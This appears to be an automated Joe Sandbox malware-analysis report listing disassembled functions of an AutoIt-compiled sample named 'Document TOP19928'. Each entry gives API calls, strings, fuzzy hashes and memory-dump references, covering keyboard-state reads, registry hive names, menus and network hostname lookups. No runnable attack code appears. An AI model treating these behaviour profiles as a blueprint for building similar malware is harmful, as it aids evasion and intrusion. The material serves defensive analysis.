^ ERROR, xrefs: 0083A1E8
"%s" (%d) : ==> %s:, xrefs: 0083A25F
Error: , xrefs: 0083A20E

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 6221cac31c44e4c0ef1115a73232303c4f6df26932ca94cc71eebde85627ca89
Instruction ID: 712000429f1c3aaca87697bcc1b12c668caea053fc9789021efb09cc3f59970f
Opcode Fuzzy Hash: 6221cac31c44e4c0ef1115a73232303c4f6df26932ca94cc71eebde85627ca89
Instruction Fuzzy Hash: CA514E71900119AACB19EBE0CD4AEEEB779FF04300F144166B515B22A1EB396E58DBA1

Function 007D6BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 007F0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,007D6C6C,?,00008000), ref: 007F0BB7

Part of subcall function 007D48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D48A1,?,?,007D37C0,?), ref: 007D48CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 007D6D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 007D6E5A

Part of subcall function 007D59CD: _wcscpy.LIBCMT ref: 007D5A05

Part of subcall function 007F387D: _iswctype.LIBCMT ref: 007F3885

Strings

Bad directive syntax error, xrefs: 0080EBC6
>>>AUTOIT SCRIPT<<<, xrefs: 0080E8BF
Unterminated string, xrefs: 0080EC0D
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0080E84A
Error opening the file, xrefs: 0080E866, 0080E8E1
AU3!, xrefs: 007D6CC1
EA06, xrefs: 0080E87B

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 138f7cdb6a167588073c62d1f91735de13fcc02b06d17a1191a60d2ac69f0ce6
Instruction ID: c78f600fab14824a7f62c1ba7b353de1ec78fef19efce12e4ddc5275d141d1c1
Opcode Fuzzy Hash: 138f7cdb6a167588073c62d1f91735de13fcc02b06d17a1191a60d2ac69f0ce6
Instruction Fuzzy Hash: B2025571108341DFC724EF24C895AAFBBF5FF98314F04492EF586972A2DA389949CB52

Function 007D45DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007D45F9
GetMenuItemCount.USER32(00896890), ref: 0080D7CD
GetMenuItemCount.USER32(00896890), ref: 0080D87D
GetCursorPos.USER32(?), ref: 0080D8C1
SetForegroundWindow.USER32(00000000), ref: 0080D8CA
TrackPopupMenuEx.USER32(00896890,00000000,?,00000000,00000000,00000000), ref: 0080D8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0080D8E9

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 6725dfcb302241b6794be4a01956d2c2eba634c68bfd91a164967d281e0d1565
Instruction ID: a864521fa7bed51a528914e45659189405a1da57d97439532a880ff8b423b295
Opcode Fuzzy Hash: 6725dfcb302241b6794be4a01956d2c2eba634c68bfd91a164967d281e0d1565
Instruction Fuzzy Hash: 5F712970601305BFEB209F54DC89FAABF64FF05368F104216F615E62D1D7B59810DB91

Function 008510A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00850038,?,?), ref: 008510BC

Strings

HKLM, xrefs: 0085113A
HKCC, xrefs: 0085118A
HKCR, xrefs: 00851164
HKEY_CURRENT_USER, xrefs: 0085119B
HKEY_CURRENT_CONFIG, xrefs: 00851179
HKEY_USERS, xrefs: 008511BD
HKEY_LOCAL_MACHINE, xrefs: 00851125
HKEY_CLASSES_ROOT, xrefs: 0085114F
HKCU, xrefs: 008511AC
HKU, xrefs: 008511CE

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 53fc976d7fd16993f0a4e1dd5984fa393c2bdbb976d275f59aa847d317a11d24
Instruction ID: fb340d6a3faf5075cb25e8e37185b34b0ab934e00b361e49e02872976cf494de
Opcode Fuzzy Hash: 53fc976d7fd16993f0a4e1dd5984fa393c2bdbb976d275f59aa847d317a11d24
Instruction Fuzzy Hash: FA413E3025024ECBCF20EFA0D999AEA3724FF56341F504555EE919B392DB34AD1ECBA0

Function 00835569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 007D7D2C: _memmove.LIBCMT ref: 007D7D66

Part of subcall function 007D7A84: _memmove.LIBCMT ref: 007D7B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008355D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 008355E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008355F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0083560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0083561C

Strings

open , xrefs: 00835581
play PlayMe wait, xrefs: 00835606
play PlayMe, xrefs: 00835617
status PlayMe mode, xrefs: 008355CD
alias PlayMe, xrefs: 008355AB
close PlayMe, xrefs: 008355E3, 00835610

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: d569316cca6b870c53d0f30dda91835578a9d9c8641fecd8efcc24b1557cfcc6
Instruction ID: e8abbf56b9f6d1d8edfedcfa51383ccdc96cf2e58e69ce4a3f4f9f8b6e95d3e3
Opcode Fuzzy Hash: d569316cca6b870c53d0f30dda91835578a9d9c8641fecd8efcc24b1557cfcc6
Instruction Fuzzy Hash: AE113021650569B9E728B6A5CC4ADFFBB7CFFD5B00F40046BB411E22D1EA681E05C7A1

Function 008348F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 0083490E
gethostname.WS2_32(?,00000100), ref: 00834928
gethostbyname.WS2_32(?), ref: 00834935
_wcscpy.LIBCMT ref: 0083495D
_memmove.LIBCMT ref: 00834970
inet_ntoa.WS2_32(?), ref: 0083497B
_strcat.LIBCMT ref: 00834989
_wcscpy.LIBCMT ref: 008349A0
WSACleanup.WS2_32 ref: 008349AE
_wcscpy.LIBCMT ref: 008349BC

Strings

0.0.0.0, xrefs: 00834957

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: a3f4092b63964cdd102713b33279ada8db143cf4963c2429fd9b14ff28ce4037
Instruction ID: 49e5a320afb5420d1dea538b1d3bbf99ff29b09031206df5852b7348cc7e2b37
Opcode Fuzzy Hash: a3f4092b63964cdd102713b33279ada8db143cf4963c2429fd9b14ff28ce4037
Instruction Fuzzy Hash: A411D831914118EBCB24EB24AC4AFEB7BACFB44711F040175FA04D62A2EF799A858691

Function 00835217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0083521C

Part of subcall function 007F0719: timeGetTime.WINMM(?,75A8B400,007E0FF9), ref: 007F071D

Sleep.KERNEL32(0000000A), ref: 00835248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0083526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0083528E
SetActiveWindow.USER32 ref: 008352AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008352BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 008352DA
Sleep.KERNEL32(000000FA), ref: 008352E5
IsWindow.USER32 ref: 008352F1
EndDialog.USER32(00000000), ref: 00835302

Strings

BUTTON, xrefs: 00835280

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 25009d837435fcd9e013d5bfa985d523f570293f5a270017563d3235bc70db5d
Instruction ID: e1b5ad0a8cd3972e796c87abce033f433a6d177f6051abfa78dd6785f5cdeb31
Opcode Fuzzy Hash: 25009d837435fcd9e013d5bfa985d523f570293f5a270017563d3235bc70db5d
Instruction Fuzzy Hash: 81219670244704AFE7017B70ED89A263B69FB96347F091435F602C22B2DB659C54C7A2

Function 0083052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 008305A7
SetKeyboardState.USER32(?), ref: 00830612
GetAsyncKeyState.USER32(000000A0), ref: 00830632
GetKeyState.USER32(000000A0), ref: 00830649
GetAsyncKeyState.USER32(000000A1), ref: 00830678
GetKeyState.USER32(000000A1), ref: 00830689
GetAsyncKeyState.USER32(00000011), ref: 008306B5
GetKeyState.USER32(00000011), ref: 008306C3
GetAsyncKeyState.USER32(00000012), ref: 008306EC
GetKeyState.USER32(00000012), ref: 008306FA
GetAsyncKeyState.USER32(0000005B), ref: 00830723
GetKeyState.USER32(0000005B), ref: 00830731

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 8785c47b47a25f78fa202eab1aeab957581cc4043387ca02c42f00778ed328c1
Instruction ID: 4eee71b25b7d93795a0388b0e4737101a29e43da64ec650b7ab2c4fbd852deee
Opcode Fuzzy Hash: 8785c47b47a25f78fa202eab1aeab957581cc4043387ca02c42f00778ed328c1
Instruction Fuzzy Hash: C7510C60A0478819FF34DBA488657EABFB4FF91380F084599C5C2D61C2EA549A4CCFD6

Function 0082C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0082C746
GetWindowRect.USER32(00000000,?), ref: 0082C758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0082C7B6
GetDlgItem.USER32(?,00000002), ref: 0082C7C1
GetWindowRect.USER32(00000000,?), ref: 0082C7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0082C827
GetDlgItem.USER32(?,000003E9), ref: 0082C835
GetWindowRect.USER32(00000000,?), ref: 0082C846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0082C889
GetDlgItem.USER32(?,000003EA), ref: 0082C897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0082C8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 0082C8C1

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 98a4a8a1a3fec34306aa57847b99cb020c74040d6d7508603c273c54652558ea
Instruction ID: fab92e021184b1c9f1fae73841d7c0e67448bc4d423fee3265b880bcf7b1adbb
Opcode Fuzzy Hash: 98a4a8a1a3fec34306aa57847b99cb020c74040d6d7508603c273c54652558ea
Instruction Fuzzy Hash: 51514C71B00205AFDB18CFA9DD89AAEBBBAFB98311F14813DF616D7291D7709D408B10

Function 007D21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 007D25DB: GetWindowLongW.USER32(?,000000EB), ref: 007D25EC

GetSysColor.USER32(0000000F), ref: 007D21D3

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 8c3855cc5154c67f86472c503cb32e26c7beaab9fa9161a0502f9b9e22a092e5
Instruction ID: d997b59928c530193f10499820f9e9edbcb8b406663e6abe18f1cf2093f95a5c
Opcode Fuzzy Hash: 8c3855cc5154c67f86472c503cb32e26c7beaab9fa9161a0502f9b9e22a092e5
Instruction Fuzzy Hash: 24417D31104640ABDB225F289C48BB93B75FB16332F194266FE658A2E3D7399C43DB61

Function 0083AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,0085F910), ref: 0083AB76
GetDriveTypeW.KERNEL32(00000061,0088A620,00000061), ref: 0083AC40
_wcscpy.LIBCMT ref: 0083AC6A

Strings

ramdisk, xrefs: 0083ABEA
network, xrefs: 0083ABD4
cdrom, xrefs: 0083AB92
all, xrefs: 0083AB7C
fixed, xrefs: 0083ABBE
unknown, xrefs: 0083AC01
removable, xrefs: 0083ABA8

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 4857f8d9c6eb658759763b192fc6756d0fa2ed25d7a1e14186de715179ad1b06
Instruction ID: c4f8e963c41a1696bbc28bddb0278a1f717165911f894de5e33b8bdc4737e26f
Opcode Fuzzy Hash: 4857f8d9c6eb658759763b192fc6756d0fa2ed25d7a1e14186de715179ad1b06
Instruction Fuzzy Hash: E851AE30108305DBC728EF14C885AAAB7A5FF91314F10482EF6D6973A2DB35D94ACB93

Function 007D9997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 007D99C2
__swprintf.LIBCMT ref: 007D9A0C
__i64tow.LIBCMT ref: 0080FA0F

Strings

True, xrefs: 0080F9D0
False, xrefs: 0080F9D7
0x%p, xrefs: 0080F9F1
%.15g, xrefs: 007D9A06

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 8ef98f63c7115346b66e11bb130677c2c5ea0b858f430498ac2a9fdee5ae5e2d
Instruction ID: 94ec5fbd347147607167c49c0334820297b9789887b853a7c92da78c6ce05ff9
Opcode Fuzzy Hash: 8ef98f63c7115346b66e11bb130677c2c5ea0b858f430498ac2a9fdee5ae5e2d
Instruction Fuzzy Hash: BF41B371604209EFDB34AB28DC46E7677F8FB44300F20846FE749D6392EA79A941CB11

Function 008573C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008573D9
CreateMenu.USER32 ref: 008573F4
SetMenu.USER32(?,00000000), ref: 00857403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00857490
IsMenu.USER32(?), ref: 008574A6
CreatePopupMenu.USER32 ref: 008574B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008574DD
DrawMenuBar.USER32 ref: 008574E5

Strings

F, xrefs: 008574D1
0, xrefs: 008573CF

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 71d3d586ef0d7af9c0562a0a9ac029427d04aa980a8f9861474699db8e16db32
Instruction ID: 0a3cd420ff9918778510ed8672b1be29e182abd9548422c42dd9a7e9d70ad167
Opcode Fuzzy Hash: 71d3d586ef0d7af9c0562a0a9ac029427d04aa980a8f9861474699db8e16db32
Instruction Fuzzy Hash: 6C416874A00249EFDB10DF64E884E9ABBB5FF49342F144029FE05E7361E734A924CB54

Function 0085772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 008577CD
CreateCompatibleDC.GDI32(00000000), ref: 008577D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 008577E7
SelectObject.GDI32(00000000,00000000), ref: 008577EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 008577FA
DeleteDC.GDI32(00000000), ref: 00857803
GetWindowLongW.USER32(?,000000EC), ref: 0085780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00857821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0085782D

Strings

static, xrefs: 00857765

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
